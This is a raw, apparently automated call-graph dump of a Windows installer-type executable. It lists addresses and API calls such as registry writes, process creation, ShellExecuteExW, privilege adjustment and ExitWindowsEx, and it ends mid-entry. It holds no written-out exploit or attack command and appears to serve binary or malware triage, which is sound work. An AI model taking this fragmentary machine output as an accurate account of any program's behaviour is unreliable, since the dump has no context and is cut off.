4531 40140b 2 API calls 4527->4531 4534 403dde SetWindowLongW 4529->4534 4535 403def 4529->4535 4533 4041ba 4530->4533 4531->4518 4536 403f2e 4532->4536 4533->4528 4543 4041eb ShowWindow 4533->4543 4534->4528 4540 403e98 4535->4540 4541 403dfb GetDlgItem 4535->4541 4536->4523 4537 403f32 SendMessageW 4536->4537 4537->4528 4538 40140b 2 API calls 4538->4554 4539 4041bc DestroyWindow EndDialog 4539->4533 4594 404298 4540->4594 4544 403e2b 4541->4544 4545 403e0e SendMessageW IsWindowEnabled 4541->4545 4543->4528 4547 403e38 4544->4547 4548 403e7f SendMessageW 4544->4548 4549 403e4b 4544->4549 4558 403e30 4544->4558 4545->4528 4545->4544 4546 4062dc 17 API calls 4546->4554 4547->4548 4547->4558 4548->4540 4551 403e53 4549->4551 4552 403e68 4549->4552 4555 40140b 2 API calls 4551->4555 4556 40140b 2 API calls 4552->4556 4553 403e66 4553->4540 4554->4528 4554->4538 4554->4539 4554->4546 4557 404231 18 API calls 4554->4557 4576 4040fc DestroyWindow 4554->4576 4585 404231 4554->4585 4555->4558 4559 403e6f 4556->4559 4557->4554 4591 40420a 4558->4591 4559->4540 4559->4558 4561 403fe3 GetDlgItem 4562 404000 ShowWindow KiUserCallbackDispatcher 4561->4562 4563 403ff8 4561->4563 4588 404253 KiUserCallbackDispatcher 4562->4588 4563->4562 4565 40402a EnableWindow 4570 40403e 4565->4570 4566 404043 GetSystemMenu EnableMenuItem SendMessageW 4567 404073 SendMessageW 4566->4567 4566->4570 4567->4570 4569 403d39 18 API calls 4569->4570 4570->4566 4570->4569 4589 404266 SendMessageW 4570->4589 4590 4062ba lstrcpynW 4570->4590 4572 4040a2 lstrlenW 4573 4062dc 17 API calls 4572->4573 4574 4040b8 SetWindowTextW 4573->4574 4575 401389 2 API calls 4574->4575 4575->4554 4576->4533 4577 404116 CreateDialogParamW 4576->4577 4577->4533 4578 404149 4577->4578 4579 404231 18 API calls 4578->4579 4580 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4579->4580 4581 401389 2 API calls 4580->4581 4582 40419a 4581->4582 4582->4528 4583 4041a2 ShowWindow 4582->4583 4584 40427d SendMessageW 4583->4584 4584->4533 4586 4062dc 17 API calls 4585->4586 4587 40423c SetDlgItemTextW 4586->4587 4587->4561 4588->4565 4589->4570 4590->4572 4592 404211 4591->4592 4593 404217 SendMessageW 4591->4593 4592->4593 4593->4553 4595 40435b 4594->4595 4596 4042b0 GetWindowLongW 4594->4596 4595->4528 4596->4595 4597 4042c5 4596->4597 4597->4595 4598 4042f2 GetSysColor 4597->4598 4599 4042f5 4597->4599 4598->4599 4600 404305 SetBkMode 4599->4600 4601 4042fb SetTextColor 4599->4601 4602 404323 4600->4602 4603 40431d GetSysColor 4600->4603 4601->4600 4604 404334 4602->4604 4605 40432a SetBkColor 4602->4605 4603->4602 4604->4595 4606 404347 DeleteObject 4604->4606 4607 40434e CreateBrushIndirect 4604->4607 4605->4604 4606->4607 4607->4595 5050 401f58 5051 402c41 17 API calls 5050->5051 5052 401f5f 5051->5052 5053 4065fd 2 API calls 5052->5053 5054 401f65 5053->5054 5056 401f76 5054->5056 5057 406201 wsprintfW 5054->5057 5057->5056 4608 402259 4609 402c41 17 API calls 4608->4609 4610 40225f 4609->4610 4611 402c41 17 API calls 4610->4611 4612 402268 4611->4612 4613 402c41 17 API calls 4612->4613 4614 402271 4613->4614 4615 4065fd 2 API calls 4614->4615 4616 40227a 4615->4616 4617 40228b lstrlenW lstrlenW 4616->4617 4618 40227e 4616->4618 4620 405322 24 API calls 4617->4620 4619 405322 24 API calls 4618->4619 4622 402286 4619->4622 4621 4022c9 SHFileOperationW 4620->4621 4621->4618 4621->4622 5058 4046db 5059 404711 5058->5059 5060 4046eb 5058->5060 5062 404298 8 API calls 5059->5062 5061 404231 18 API calls 5060->5061 5063 4046f8 SetDlgItemTextW 5061->5063 5064 40471d 5062->5064 5063->5059 4623 40175c 4624 402c41 17 API calls 4623->4624 4625 401763 4624->4625 4626 405ddf 2 API calls 4625->4626 4627 40176a 4626->4627 4628 405ddf 2 API calls 4627->4628 4628->4627 5065 4022dd 5066 4022f7 5065->5066 5067 4022e4 5065->5067 5068 4062dc 17 API calls 5067->5068 5069 4022f1 5068->5069 5070 405920 MessageBoxIndirectW 5069->5070 5070->5066 5071 401d5d GetDlgItem GetClientRect 5072 402c41 17 API calls 5071->5072 5073 401d8f LoadImageW SendMessageW 5072->5073 5074 402ac5 5073->5074 5075 401dad DeleteObject 5073->5075 5075->5074 4651 405461 4652 405482 GetDlgItem GetDlgItem GetDlgItem 4651->4652 4653 40560b 4651->4653 4697 404266 SendMessageW 4652->4697 4655 405614 GetDlgItem CreateThread CloseHandle 4653->4655 4656 40563c 4653->4656 4655->4656 4700 4053f5 5 API calls 4655->4700 4657 405667 4656->4657 4659 405653 ShowWindow ShowWindow 4656->4659 4660 40568c 4656->4660 4661 405673 4657->4661 4662 4056c7 4657->4662 4658 4054f2 4667 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4658->4667 4699 404266 SendMessageW 4659->4699 4666 404298 8 API calls 4660->4666 4664 4056a1 ShowWindow 4661->4664 4665 40567b 4661->4665 4662->4660 4670 4056d5 SendMessageW 4662->4670 4673 4056c1 4664->4673 4674 4056b3 4664->4674 4671 40420a SendMessageW 4665->4671 4672 40569a 4666->4672 4668 405567 4667->4668 4669 40554b SendMessageW SendMessageW 4667->4669 4675 40557a 4668->4675 4676 40556c SendMessageW 4668->4676 4669->4668 4670->4672 4677 4056ee CreatePopupMenu 4670->4677 4671->4660 4679 40420a SendMessageW 4673->4679 4678 405322 24 API calls 4674->4678 4681 404231 18 API calls 4675->4681 4676->4675 4680 4062dc 17 API calls 4677->4680 4678->4673 4679->4662 4682 4056fe AppendMenuW 4680->4682 4683 40558a 4681->4683 4684 40571b GetWindowRect 4682->4684 4685 40572e TrackPopupMenu 4682->4685 4686 405593 ShowWindow 4683->4686 4687 4055c7 GetDlgItem SendMessageW 4683->4687 4684->4685 4685->4672 4688 405749 4685->4688 4689 4055b6 4686->4689 4690 4055a9 ShowWindow 4686->4690 4687->4672 4691 4055ee SendMessageW SendMessageW 4687->4691 4692 405765 SendMessageW 4688->4692 4698 404266 SendMessageW 4689->4698 4690->4689 4691->4672 4692->4692 4693 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4692->4693 4695 4057a7 SendMessageW 4693->4695 4695->4695 4696 4057d0 GlobalUnlock SetClipboardData CloseClipboard 4695->4696 4696->4672 4697->4658 4698->4687 4699->4657 5076 401563 5077 402a6b 5076->5077 5080 406201 wsprintfW 5077->5080 5079 402a70 5080->5079 4705 4023e4 4706 402c41 17 API calls 4705->4706 4707 4023f6 4706->4707 4708 402c41 17 API calls 4707->4708 4709 402400 4708->4709 4722 402cd1 4709->4722 4712 402438 4714 402444 4712->4714 4716 402c1f 17 API calls 4712->4716 4713 402c41 17 API calls 4715 40242e lstrlenW 4713->4715 4717 402463 RegSetValueExW 4714->4717 4718 403116 31 API calls 4714->4718 4715->4712 4716->4714 4719 402479 RegCloseKey 4717->4719 4718->4717 4721 40288b 4719->4721 4723 402cec 4722->4723 4726 406155 4723->4726 4727 406164 4726->4727 4728 402410 4727->4728 4729 40616f RegCreateKeyExW 4727->4729 4728->4712 4728->4713 4728->4721 4729->4728 4730 4058e6 ShellExecuteExW 5081 404367 lstrcpynW lstrlenW 4731 402868 4732 402c41 17 API calls 4731->4732 4733 40286f FindFirstFileW 4732->4733 4734 402897 4733->4734 4737 402882 4733->4737 4739 406201 wsprintfW 4734->4739 4736 4028a0 4740 4062ba lstrcpynW 4736->4740 4739->4736 4740->4737 5082 401968 5083 402c1f 17 API calls 5082->5083 5084 40196f 5083->5084 5085 402c1f 17 API calls 5084->5085 5086 40197c 5085->5086 5087 402c41 17 API calls 5086->5087 5088 401993 lstrlenW 5087->5088 5090 4019a4 5088->5090 5089 4019e5 5090->5089 5094 4062ba lstrcpynW 5090->5094 5092 4019d5 5092->5089 5093 4019da lstrlenW 5092->5093 5093->5089 5094->5092 5095 403968 5096 403973 5095->5096 5097 40397a GlobalAlloc 5096->5097 5098 403977 5096->5098 5097->5098 5099 40166a 5100 402c41 17 API calls 5099->5100 5101 401670 5100->5101 5102 4065fd 2 API calls 5101->5102 5103 401676 5102->5103 5104 7396103d 5105 7396101b 5 API calls 5104->5105 5106 73961056 5105->5106 4741 4027ef 4742 4027f6 4741->4742 4744 402a70 4741->4744 4743 402c1f 17 API calls 4742->4743 4745 4027fd 4743->4745 4746 40280c SetFilePointer 4745->4746 4746->4744 4747 40281c 4746->4747 4749 406201 wsprintfW 4747->4749 4749->4744 4750 40176f 4751 402c41 17 API calls 4750->4751 4752 401776 4751->4752 4753 401796 4752->4753 4754 40179e 4752->4754 4790 4062ba lstrcpynW 4753->4790 4791 4062ba lstrcpynW 4754->4791 4757 40179c 4761 40654e 5 API calls 4757->4761 4758 4017a9 4759 405b8f 3 API calls 4758->4759 4760 4017af lstrcatW 4759->4760 4760->4757 4778 4017bb 4761->4778 4762 4065fd 2 API calls 4762->4778 4763 4017f7 4764 405d8b 2 API calls 4763->4764 4764->4778 4766 4017cd CompareFileTime 4766->4778 4767 40188d 4768 405322 24 API calls 4767->4768 4770 401897 4768->4770 4769 401864 4771 405322 24 API calls 4769->4771 4788 401879 4769->4788 4773 403116 31 API calls 4770->4773 4771->4788 4772 4062ba lstrcpynW 4772->4778 4774 4018aa 4773->4774 4775 4018be SetFileTime 4774->4775 4777 4018d0 CloseHandle 4774->4777 4775->4777 4776 4062dc 17 API calls 4776->4778 4779 4018e1 4777->4779 4777->4788 4778->4762 4778->4763 4778->4766 4778->4767 4778->4769 4778->4772 4778->4776 4784 405920 MessageBoxIndirectW 4778->4784 4789 405db0 GetFileAttributesW CreateFileW 4778->4789 4780 4018e6 4779->4780 4781 4018f9 4779->4781 4782 4062dc 17 API calls 4780->4782 4783 4062dc 17 API calls 4781->4783 4785 4018ee lstrcatW 4782->4785 4786 401901 4783->4786 4784->4778 4785->4786 4787 405920 MessageBoxIndirectW 4786->4787 4787->4788 4789->4778 4790->4757 4791->4758 5107 4043f0 5109 404408 5107->5109 5110 404522 5107->5110 5108 40458c 5111 404656 5108->5111 5112 404596 GetDlgItem 5108->5112 5113 404231 18 API calls 5109->5113 5110->5108 5110->5111 5116 40455d GetDlgItem SendMessageW 5110->5116 5118 404298 8 API calls 5111->5118 5114 4045b0 5112->5114 5115 404617 5112->5115 5117 40446f 5113->5117 5114->5115 5120 4045d6 SendMessageW LoadCursorW SetCursor 5114->5120 5115->5111 5121 404629 5115->5121 5140 404253 KiUserCallbackDispatcher 5116->5140 5123 404231 18 API calls 5117->5123 5119 404651 5118->5119 5144 40469f 5120->5144 5125 40463f 5121->5125 5126 40462f SendMessageW 5121->5126 5128 40447c CheckDlgButton 5123->5128 5125->5119 5130 404645 SendMessageW 5125->5130 5126->5125 5127 404587 5141 40467b 5127->5141 5138 404253 KiUserCallbackDispatcher 5128->5138 5130->5119 5133 40449a GetDlgItem 5139 404266 SendMessageW 5133->5139 5135 4044b0 SendMessageW 5136 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5135->5136 5137 4044cd GetSysColor 5135->5137 5136->5119 5137->5136 5138->5133 5139->5135 5140->5127 5142 404689 5141->5142 5143 40468e SendMessageW 5141->5143 5142->5143 5143->5108 5147 4058e6 ShellExecuteExW 5144->5147 5146 404605 LoadCursorW SetCursor 5146->5115 5147->5146 5148 401a72 5149 402c1f 17 API calls 5148->5149 5150 401a7b 5149->5150 5151 402c1f 17 API calls 5150->5151 5152 401a20 5151->5152 4983 401573 4984 401583 ShowWindow 4983->4984 4985 40158c 4983->4985 4984->4985 4986 402ac5 4985->4986 4987 40159a ShowWindow 4985->4987 4987->4986 5153 401cf3 5154 402c1f 17 API calls 5153->5154 5155 401cf9 IsWindow 5154->5155 5156 401a20 5155->5156 5157 402df3 5158 402e05 SetTimer 5157->5158 5160 402e1e 5157->5160 5158->5160 5159 402e73 5160->5159 5161 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5160->5161 5161->5159 5162 4014f5 SetForegroundWindow 5163 402ac5 5162->5163 5164 402576 5165 402c41 17 API calls 5164->5165 5166 40257d 5165->5166 5169 405db0 GetFileAttributesW CreateFileW 5166->5169 5168 402589 5169->5168 5170 401b77 5171 401b84 5170->5171 5172 401bc8 5170->5172 5175 401c0d 5171->5175 5180 401b9b 5171->5180 5173 401bf2 GlobalAlloc 5172->5173 5174 401bcd 5172->5174 5177 4062dc 17 API calls 5173->5177 5188 4022f7 5174->5188 5191 4062ba lstrcpynW 5174->5191 5176 4062dc 17 API calls 5175->5176 5175->5188 5178 4022f1 5176->5178 5177->5175 5184 405920 MessageBoxIndirectW 5178->5184 5189 4062ba lstrcpynW 5180->5189 5182 401bdf GlobalFree 5182->5188 5183 401baa 5190 4062ba lstrcpynW 5183->5190 5184->5188 5186 401bb9 5192 4062ba lstrcpynW 5186->5192 5189->5183 5190->5186 5191->5182 5192->5188 4995 4024f8 4996 402c81 17 API calls 4995->4996 4997 402502 4996->4997 4998 402c1f 17 API calls 4997->4998 4999 40250b 4998->4999 5000 40251a 4999->5000 5005 40288b 4999->5005 5001 402533 RegEnumValueW 5000->5001 5002 402527 RegEnumKeyW 5000->5002 5003 40254f RegCloseKey 5001->5003 5004 402548 5001->5004 5002->5003 5003->5005 5004->5003 5193 404a78 5194 404aa4 5193->5194 5195 404a88 5193->5195 5197 404ad7 5194->5197 5198 404aaa SHGetPathFromIDListW 5194->5198 5204 405904 GetDlgItemTextW 5195->5204 5200 404ac1 SendMessageW 5198->5200 5201 404aba 5198->5201 5199 404a95 SendMessageW 5199->5194 5200->5197 5203 40140b 2 API calls 5201->5203 5203->5200 5204->5199 5205 40167b 5206 402c41 17 API calls 5205->5206 5207 401682 5206->5207 5208 402c41 17 API calls 5207->5208 5209 40168b 5208->5209 5210 402c41 17 API calls 5209->5210 5211 401694 MoveFileW 5210->5211 5212 4016a0 5211->5212 5213 4016a7 5211->5213 5214 401423 24 API calls 5212->5214 5215 4065fd 2 API calls 5213->5215 5217 402250 5213->5217 5214->5217 5216 4016b6 5215->5216 5216->5217 5218 406080 36 API calls 5216->5218 5218->5212 5219 401e7d 5220 402c41 17 API calls 5219->5220 5221 401e83 5220->5221 5222 402c41 17 API calls 5221->5222 5223 401e8c 5222->5223 5224 402c41 17 API calls 5223->5224 5225 401e95 5224->5225 5226 402c41 17 API calls 5225->5226 5227 401e9e 5226->5227 5228 401423 24 API calls 5227->5228 5229 401ea5 5228->5229 5236 4058e6 ShellExecuteExW 5229->5236 5231 401ee7 5232 406745 5 API calls 5231->5232 5234 40288b 5231->5234 5233 401f01 CloseHandle 5232->5233 5233->5234 5236->5231 5237 4019ff 5238 402c41 17 API calls 5237->5238 5239 401a06 5238->5239 5240 402c41 17 API calls 5239->5240 5241 401a0f 5240->5241 5242 401a16 lstrcmpiW 5241->5242 5243 401a28 lstrcmpW 5241->5243 5244 401a1c 5242->5244 5243->5244 5245 401000 5246 401037 BeginPaint GetClientRect 5245->5246 5247 40100c DefWindowProcW 5245->5247 5249 4010f3 5246->5249 5252 401179 5247->5252 5250 401073 CreateBrushIndirect FillRect DeleteObject 5249->5250 5251 4010fc 5249->5251 5250->5249 5253 401102 CreateFontIndirectW 5251->5253 5254 401167 EndPaint 5251->5254 5253->5254 5255 401112 6 API calls 5253->5255 5254->5252 5255->5254 5256 73962c57 5257 73962c6f 5256->5257 5258 7396158f 2 API calls 5257->5258 5259 73962c8a 5258->5259 5260 739616d4 5261 73961703 5260->5261 5262 73961b5f 22 API calls 5261->5262 5263 7396170a 5262->5263 5264 73961711 5263->5264 5265 7396171d 5263->5265 5266 73961272 2 API calls 5264->5266 5267 73961727 5265->5267 5268 73961744 5265->5268 5272 7396171b 5266->5272 5269 7396153d 3 API calls 5267->5269 5270 7396176e 5268->5270 5271 7396174a 5268->5271 5274 7396172c 5269->5274 5273 7396153d 3 API calls 5270->5273 5275 739615b4 3 API calls 5271->5275 5273->5272 5276 739615b4 3 API calls 5274->5276 5277 7396174f 5275->5277 5278 73961732 5276->5278 5279 73961272 2 API calls 5277->5279 5281 73961272 2 API calls 5278->5281 5280 73961755 GlobalFree 5279->5280 5280->5272 5282 73961769 GlobalFree 5280->5282 5283 73961738 GlobalFree 5281->5283 5282->5272 5283->5272 5284 401503 5285 40150b 5284->5285 5287 40151e 5284->5287 5286 402c1f 17 API calls 5285->5286 5286->5287 4088 402104 4089 402c41 17 API calls 4088->4089 4090 40210b 4089->4090 4091 402c41 17 API calls 4090->4091 4092 402115 4091->4092 4093 402c41 17 API calls 4092->4093 4094 40211f 4093->4094 4095 402c41 17 API calls 4094->4095 4096 402129 4095->4096 4097 402c41 17 API calls 4096->4097 4099 402133 4097->4099 4098 402172 CoCreateInstance 4103 402191 4098->4103 4099->4098 4100 402c41 17 API calls 4099->4100 4100->4098 4101 401423 24 API calls 4102 402250 4101->4102 4103->4101 4103->4102 4104 402484 4115 402c81 4104->4115 4107 402c41 17 API calls 4108 402497 4107->4108 4109 4024a2 RegQueryValueExW 4108->4109 4114 40288b 4108->4114 4110 4024c8 RegCloseKey 4109->4110 4111 4024c2 4109->4111 4110->4114 4111->4110 4120 406201 wsprintfW 4111->4120 4116 402c41 17 API calls 4115->4116 4117 402c98 4116->4117 4118 406127 RegOpenKeyExW 4117->4118 4119 40248e 4118->4119 4119->4107 4120->4110 4124 401f06 4125 402c41 17 API calls 4124->4125 4126 401f0c 4125->4126 4127 405322 24 API calls 4126->4127 4128 401f16 4127->4128 4139 4058a3 CreateProcessW 4128->4139 4131 401f3f CloseHandle 4134 40288b 4131->4134 4135 401f31 4136 401f41 4135->4136 4137 401f36 4135->4137 4136->4131 4147 406201 wsprintfW 4137->4147 4140 401f1c 4139->4140 4141 4058d6 CloseHandle 4139->4141 4140->4131 4140->4134 4142 406745 WaitForSingleObject 4140->4142 4141->4140 4144 40675f 4142->4144 4143 406771 GetExitCodeProcess 4143->4135 4144->4143 4148 4066d0 4144->4148 4147->4131 4149 4066ed PeekMessageW 4148->4149 4150 4066e3 DispatchMessageW 4149->4150 4151 4066fd WaitForSingleObject 4149->4151 4150->4149 4151->4144 4187 40230c 4188 402314 4187->4188 4189 40231a 4187->4189 4191 402c41 17 API calls 4188->4191 4190 402328 4189->4190 4192 402c41 17 API calls 4189->4192 4193 402c41 17 API calls 4190->4193 4195 402336 4190->4195 4191->4189 4192->4190 4193->4195 4194 402c41 17 API calls 4196 40233f WritePrivateProfileStringW 4194->4196 4195->4194 5288 40190c 5289 401943 5288->5289 5290 402c41 17 API calls 5289->5290 5291 401948 5290->5291 5292 4059cc 67 API calls 5291->5292 5293 401951 5292->5293 5294 401f8c 5295 402c41 17 API calls 5294->5295 5296 401f93 5295->5296 5297 406694 5 API calls 5296->5297 5298 401fa2 5297->5298 5299 401fbe GlobalAlloc 5298->5299 5302 402026 5298->5302 5300 401fd2 5299->5300 5299->5302 5301 406694 5 API calls 5300->5301 5303 401fd9 5301->5303 5304 406694 5 API calls 5303->5304 5305 401fe3 5304->5305 5305->5302 5309 406201 wsprintfW 5305->5309 5307 402018 5310 406201 wsprintfW 5307->5310 5309->5307 5310->5302 4204 40238e 4205 4023c1 4204->4205 4206 402396 4204->4206 4207 402c41 17 API calls 4205->4207 4208 402c81 17 API calls 4206->4208 4209 4023c8 4207->4209 4210 40239d 4208->4210 4216 402cff 4209->4216 4212 4023a7 4210->4212 4215 4023d5 4210->4215 4213 402c41 17 API calls 4212->4213 4214 4023ae RegDeleteValueW RegCloseKey 4213->4214 4214->4215 4217 402d13 4216->4217 4218 402d0c 4216->4218 4217->4218 4220 402d44 4217->4220 4218->4215 4221 406127 RegOpenKeyExW 4220->4221 4222 402d72 4221->4222 4223 402dec 4222->4223 4225 402d76 4222->4225 4223->4218 4224 402d98 RegEnumKeyW 4224->4225 4226 402daf RegCloseKey 4224->4226 4225->4224 4225->4226 4227 402dd0 RegCloseKey 4225->4227 4229 402d44 6 API calls 4225->4229 4228 406694 5 API calls 4226->4228 4227->4223 4230 402dbf 4228->4230 4229->4225 4231 402de0 RegDeleteKeyW 4230->4231 4232 402dc3 4230->4232 4231->4223 4232->4223 5311 73961058 5313 73961074 5311->5313 5312 739610dd 5313->5312 5314 73961516 GlobalFree 5313->5314 5315 73961092 5313->5315 5314->5315 5316 73961516 GlobalFree 5315->5316 5317 739610a2 5316->5317 5318 739610b2 5317->5318 5319 739610a9 GlobalSize 5317->5319 5320 739610b6 GlobalAlloc 5318->5320 5322 739610c7 5318->5322 5319->5318 5321 7396153d 3 API calls 5320->5321 5321->5322 5323 739610d2 GlobalFree 5322->5323 5323->5312 4233 40338f SetErrorMode GetVersion 4234 4033ce 4233->4234 4235 4033d4 4233->4235 4236 406694 5 API calls 4234->4236 4237 406624 3 API calls 4235->4237 4236->4235 4238 4033ea lstrlenA 4237->4238 4238->4235 4239 4033fa 4238->4239 4240 406694 5 API calls 4239->4240 4241 403401 4240->4241 4242 406694 5 API calls 4241->4242 4243 403408 4242->4243 4244 406694 5 API calls 4243->4244 4245 403414 #17 OleInitialize SHGetFileInfoW 4244->4245 4323 4062ba lstrcpynW 4245->4323 4248 403460 GetCommandLineW 4324 4062ba lstrcpynW 4248->4324 4250 403472 4251 405bbc CharNextW 4250->4251 4252 403497 CharNextW 4251->4252 4253 4035c1 GetTempPathW 4252->4253 4263 4034b0 4252->4263 4325 40335e 4253->4325 4255 4035d9 4256 403633 DeleteFileW 4255->4256 4257 4035dd GetWindowsDirectoryW lstrcatW 4255->4257 4335 402edd GetTickCount GetModuleFileNameW 4256->4335 4258 40335e 12 API calls 4257->4258 4261 4035f9 4258->4261 4259 405bbc CharNextW 4259->4263 4261->4256 4264 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4261->4264 4262 403647 4272 405bbc CharNextW 4262->4272 4306 4036ea 4262->4306 4318 4036fa 4262->4318 4263->4259 4266 4035ac 4263->4266 4268 4035aa 4263->4268 4267 40335e 12 API calls 4264->4267 4419 4062ba lstrcpynW 4266->4419 4270 40362b 4267->4270 4268->4253 4270->4256 4270->4318 4285 403666 4272->4285 4274 403834 4277 4038b8 ExitProcess 4274->4277 4278 40383c GetCurrentProcess OpenProcessToken 4274->4278 4275 403714 4429 405920 4275->4429 4283 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4278->4283 4284 403888 4278->4284 4280 4036c4 4286 405c97 18 API calls 4280->4286 4281 40372a 4287 40588b 5 API calls 4281->4287 4283->4284 4288 406694 5 API calls 4284->4288 4285->4280 4285->4281 4289 4036d0 4286->4289 4290 40372f lstrcatW 4287->4290 4297 40388f 4288->4297 4289->4318 4420 4062ba lstrcpynW 4289->4420 4291 403740 lstrcatW 4290->4291 4292 40374b lstrcatW lstrcmpiW 4290->4292 4291->4292 4296 403767 4292->4296 4292->4318 4293 4038a4 ExitWindowsEx 4293->4277 4294 4038b1 4293->4294 4435 40140b 4294->4435 4300 403773 4296->4300 4301 40376c 4296->4301 4297->4293 4297->4294 4299 4036df 4421 4062ba lstrcpynW 4299->4421 4302 40586e 2 API calls 4300->4302 4304 4057f1 4 API calls 4301->4304 4305 403778 SetCurrentDirectoryW 4302->4305 4307 403771 4304->4307 4308 403793 4305->4308 4309 403788 4305->4309 4363 4039aa 4306->4363 4307->4305 4434 4062ba lstrcpynW 4308->4434 4433 4062ba lstrcpynW 4309->4433 4312 4062dc 17 API calls 4313 4037d2 DeleteFileW 4312->4313 4314 4037df CopyFileW 4313->4314 4320 4037a1 4313->4320 4314->4320 4315 403828 4316 406080 36 API calls 4315->4316 4316->4318 4317 406080 36 API calls 4317->4320 4422 4038d0 4318->4422 4319 4062dc 17 API calls 4319->4320 4320->4312 4320->4315 4320->4317 4320->4319 4321 4058a3 2 API calls 4320->4321 4322 403813 CloseHandle 4320->4322 4321->4320 4322->4320 4323->4248 4324->4250 4326 40654e 5 API calls 4325->4326 4328 40336a 4326->4328 4327 403374 4327->4255 4328->4327 4329 405b8f 3 API calls 4328->4329 4330 40337c 4329->4330 4331 40586e 2 API calls 4330->4331 4332 403382 4331->4332 4438 405ddf 4332->4438 4442 405db0 GetFileAttributesW CreateFileW 4335->4442 4337 402f1d 4356 402f2d 4337->4356 4443 4062ba lstrcpynW 4337->4443 4339 402f43 4340 405bdb 2 API calls 4339->4340 4341 402f49 4340->4341 4444 4062ba lstrcpynW 4341->4444 4343 402f54 GetFileSize 4344 403050 4343->4344 4362 402f6b 4343->4362 4445 402e79 4344->4445 4346 403059 4348 403089 GlobalAlloc 4346->4348 4346->4356 4480 403347 SetFilePointer 4346->4480 4456 403347 SetFilePointer 4348->4456 4349 4030bc 4353 402e79 6 API calls 4349->4353 4352 4030a4 4457 403116 4352->4457 4353->4356 4354 403072 4357 403331 ReadFile 4354->4357 4356->4262 4359 40307d 4357->4359 4358 402e79 6 API calls 4358->4362 4359->4348 4359->4356 4360 4030b0 4360->4356 4360->4360 4361 4030ed SetFilePointer 4360->4361 4361->4356 4362->4344 4362->4349 4362->4356 4362->4358 4477 403331 4362->4477 4364 406694 5 API calls 4363->4364 4365 4039be 4364->4365 4366 4039c4 4365->4366 4367 4039d6 4365->4367 4497 406201 wsprintfW 4366->4497 4368 406188 3 API calls 4367->4368 4369 403a06 4368->4369 4370 403a25 lstrcatW 4369->4370 4373 406188 3 API calls 4369->4373 4372 4039d4 4370->4372 4482 403c80 4372->4482 4373->4370 4376 405c97 18 API calls 4377 403a57 4376->4377 4378 403aeb 4377->4378 4380 406188 3 API calls 4377->4380 4379 405c97 18 API calls 4378->4379 4382 403af1 4379->4382 4383 403a89 4380->4383 4381 403b01 LoadImageW 4385 403ba7 4381->4385 4386 403b28 RegisterClassW 4381->4386 4382->4381 4384 4062dc 17 API calls 4382->4384 4383->4378 4387 403aaa lstrlenW 4383->4387 4390 405bbc CharNextW 4383->4390 4384->4381 4389 40140b 2 API calls 4385->4389 4388 403b5e SystemParametersInfoW CreateWindowExW 4386->4388 4418 403bb1 4386->4418 4391 403ab8 lstrcmpiW 4387->4391 4392 403ade 4387->4392 4388->4385 4393 403bad 4389->4393 4394 403aa7 4390->4394 4391->4392 4395 403ac8 GetFileAttributesW 4391->4395 4396 405b8f 3 API calls 4392->4396 4398 403c80 18 API calls 4393->4398 4393->4418 4394->4387 4397 403ad4 4395->4397 4399 403ae4 4396->4399 4397->4392 4400 405bdb 2 API calls 4397->4400 4401 403bbe 4398->4401 4498 4062ba lstrcpynW 4399->4498 4400->4392 4403 403bca ShowWindow 4401->4403 4404 403c4d 4401->4404 4406 406624 3 API calls 4403->4406 4490 4053f5 OleInitialize 4404->4490 4408 403be2 4406->4408 4407 403c53 4410 403c57 4407->4410 4411 403c6f 4407->4411 4409 403bf0 GetClassInfoW 4408->4409 4412 406624 3 API calls 4408->4412 4414 403c04 GetClassInfoW RegisterClassW 4409->4414 4415 403c1a DialogBoxParamW 4409->4415 4417 40140b 2 API calls 4410->4417 4410->4418 4413 40140b 2 API calls 4411->4413 4412->4409 4413->4418 4414->4415 4416 40140b 2 API calls 4415->4416 4416->4418 4417->4418 4418->4318 4419->4268 4420->4299 4421->4306 4423 4038e8 4422->4423 4424 4038da CloseHandle 4422->4424 4510 403915 4423->4510 4424->4423 4427 4059cc 67 API calls 4428 403703 OleUninitialize 4427->4428 4428->4274 4428->4275 4430 405935 4429->4430 4431 403722 ExitProcess 4430->4431 4432 405949 MessageBoxIndirectW 4430->4432 4432->4431 4433->4308 4434->4320 4436 401389 2 API calls 4435->4436 4437 401420 4436->4437 4437->4277 4439 405dec GetTickCount GetTempFileNameW 4438->4439 4440 405e22 4439->4440 4441 40338d 4439->4441 4440->4439 4440->4441 4441->4255 4442->4337 4443->4339 4444->4343 4446 402e82 4445->4446 4447 402e9a 4445->4447 4448 402e92 4446->4448 4449 402e8b DestroyWindow 4446->4449 4450 402ea2 4447->4450 4451 402eaa GetTickCount 4447->4451 4448->4346 4449->4448 4452 4066d0 2 API calls 4450->4452 4453 402eb8 CreateDialogParamW ShowWindow 4451->4453 4454 402edb 4451->4454 4455 402ea8 4452->4455 4453->4454 4454->4346 4455->4346 4456->4352 4458 40312f 4457->4458 4459 40315d 4458->4459 4481 403347 SetFilePointer 4458->4481 4461 403331 ReadFile 4459->4461 4462 403168 4461->4462 4463 4032ca 4462->4463 4464 40317a GetTickCount 4462->4464 4466 4032b4 4462->4466 4465 40330c 4463->4465 4470 4032ce 4463->4470 4464->4466 4473 4031c9 4464->4473 4467 403331 ReadFile 4465->4467 4466->4360 4467->4466 4468 403331 ReadFile 4468->4473 4469 403331 ReadFile 4469->4470 4470->4466 4470->4469 4471 405e62 WriteFile 4470->4471 4471->4470 4472 40321f GetTickCount 4472->4473 4473->4466 4473->4468 4473->4472 4474 403244 MulDiv wsprintfW 4473->4474 4476 405e62 WriteFile 4473->4476 4475 405322 24 API calls 4474->4475 4475->4473 4476->4473 4478 405e33 ReadFile 4477->4478 4479 403344 4478->4479 4479->4362 4480->4354 4481->4459 4483 403c94 4482->4483 4499 406201 wsprintfW 4483->4499 4485 403d05 4500 403d39 4485->4500 4487 403a35 4487->4376 4488 403d0a 4488->4487 4489 4062dc 17 API calls 4488->4489 4489->4488 4503 40427d 4490->4503 4492 40427d SendMessageW 4494 405451 OleUninitialize 4492->4494 4493 405418 4496 40543f 4493->4496 4506 401389 4493->4506 4494->4407 4496->4492 4497->4372 4498->4378 4499->4485 4501 4062dc 17 API calls 4500->4501 4502 403d47 SetWindowTextW 4501->4502 4502->4488 4504 404295 4503->4504 4505 404286 